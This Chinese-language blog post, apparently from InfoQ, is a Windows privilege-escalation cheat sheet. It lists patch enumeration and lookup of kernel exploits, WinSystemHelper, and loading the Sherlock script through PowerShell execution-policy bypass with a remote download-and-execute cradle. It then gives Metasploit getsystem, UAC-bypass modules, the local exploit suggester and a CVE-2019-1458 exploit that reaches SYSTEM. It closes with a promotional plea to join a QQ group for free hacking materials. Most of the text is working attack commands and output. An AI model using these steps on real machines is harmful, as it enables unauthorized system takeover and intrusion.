1.可利用漏洞信息收集
收集本机 systeminfo 中补丁信息
在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用 exp
然后查询 exp,选择对应的 Exp 下载运行即可。https://i.hacking8.com/https://github.com/SecWiki/windows-kernel-exploits
提权 Exp 的运行方式,一般有以下几种:
直接执行exe程序,成功后会打开一个cmd窗口,在新窗口中权限就是system在WebShell中执行exe程序,执行方式为xxx.exe whoami,成功后直接执行命令,再修改命令内容,可以执行不同的命令利用MSF等工具C++源码,Python脚本,PowerShell脚本等特殊方式
复制代码
2.WinSystemHelper
使用 WinSystemHelper 检查可利用的漏洞。该工具适合在任何 Windows 服务器上进行已知提权漏洞的检测
https://github.com/brianwrf/WinSystemHelper
上传 WinSysHelper.bat、explt2003.txt、expgt2003.txt,运行 bat 查看结果
然后在可利用的 Exp 中任意下载一个并执行即可
3.Sherlock
Sherlock 是在 Windows 下用于本地提权的 PowerShell 脚本分析漏洞出漏洞后利用对应 Exp 即可
# 启动Powershell$ powershell.exe -exec bypass
# 本地加载脚本$ Import-Module Sherlock.ps1
# 远程加载脚本$ IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
# 检查漏洞,Vulnstatus为Appears Vulnerable即存在漏洞$ Find-AllVulns
复制代码
4.msf 中的提权方法
getsystem
meterpreter> getsystem
BypassUAC
use exploit/windows/local/bypassuacuse exploit/windows/local/bypassuac_injectionuse windows/local/bypassuac_vbsuse windows/local/ask
复制代码
meterpreter> background # 后台session msf> use exploit/windows/local/bypassuacmsf> set SESSION <session_id> # 后台session时会返回session_id,如不清楚可以使用命令sessions -lmsf> run
复制代码
内核提权
# 查询补丁meterpreter> run post/windows/gather/enum_patches [+] KB2999226 installed on 11/25/2020[+] KB976902 installed on 11/21/2010
# 查询Expmsf> use post/multi/recon/local_exploit_suggester msf> set LHOST <攻击机IP>msf> set SESSION <session_id>msf> run
# 利用示例msf> use exploit/windows/local/cve_2019_1458_wizardopium msf> set SESSION <session_id>msf> runmeterpreter> getuidServer username: NT AUTHORITY\SYSTEM
复制代码
看到这里的大佬,动动发财的小手 点赞 + 回复 + 收藏,能【 关注 】一波就更好了
为了感谢读者们,我想把我收藏的一些网络安全/渗透测试学习干货贡献给大家,回馈每一个读者,希望能帮到你们。
干货主要有:
① 2000 多本网安必看电子书(主流和经典的书籍应该都有了)
② PHP 标准库资料(最全中文版)
③ 项目源码(四五十个有趣且经典的练手项目及源码)
④ 网络安全基础入门、Linux 运维,web 安全、渗透测试方面的视频(适合小白学习)
⑤ 网络安全学习路线图(告别不入流的学习)
⑥ 渗透测试工具大全
⑦ 2021 网络安全/Web 安全/渗透测试工程师面试手册大全
各位朋友们可以关注+评论一波 然后加下QQ群:581499282 备注:infoq 联系管理大大即可免费获取全部资料
评论